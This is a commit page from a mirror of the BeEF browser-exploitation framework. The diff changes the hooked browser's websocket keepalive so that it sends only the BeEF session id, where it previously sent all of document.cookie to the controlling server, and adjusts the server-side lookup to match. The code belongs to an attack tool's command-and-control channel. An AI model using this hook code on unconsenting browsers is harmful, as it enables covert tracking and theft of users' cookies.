Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixed issue when hooking a browser that contains other cookies than BEEFHOOK. now "alive" send back only the BeEF session value

Browse Source
This commit is contained in:
antisnatchor
2012-05-02 14:01:04 +03:00
parent 9ae0929a8c
commit 2c19a3a8d8
2 changed files with 7 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
core/main/client/websocket.js
View File

@@ -60,13 +60,14 @@ beef.websocket = {
console.log("Sent [" + data + "]");
},
//todo antisnatchor: we need to get only the BEEFHOOK cookie value, not every cookie.
//todo in this way it will be easier to parse it server side.
alive: function (){
beef.websocket.send('{"alive":"'+document.cookie+'"}');
beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
console.log("sent alive");
setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
}
};
beef.regCmp('beef.websocket');

8
core/main/network_stack/websocket/websocket.rb
View File

@@ -27,10 +27,10 @@ module BeEF
MOUNTS = BeEF::Core::Server.instance.mounts
@@activeSocket= Hash.new #empty at begin
@@lastalive= Hash.new
@@config = BeEF::Core::Configuration.instance
def initialize
config = BeEF::Core::Configuration.instance
port = config.get("beef.http.websocket.port")
secure = config.get("beef.http.websocket.secure")
port = @@config.get("beef.http.websocket.port")
secure = @@config.get("beef.http.websocket.secure")
#todo antisnatchor: start websocket secure if beef.http.websocket.secure == true
server = WebSocketServer.new :accepted_domains => "127.0.0.1",
:port => port
@@ -54,7 +54,7 @@ module BeEF
print_debug("In activesocket we have #{@@activeSocket}")
elsif messageHash["alive"] != nil
#@todo browser could be not in bd so we have to add it
hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => messageHash["alive"].gsub("BEEFHOOK=",""))
hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => messageHash["alive"])
hooked_browser.lastseen = Time.new.to_i
hooked_browser.count!
hooked_browser.save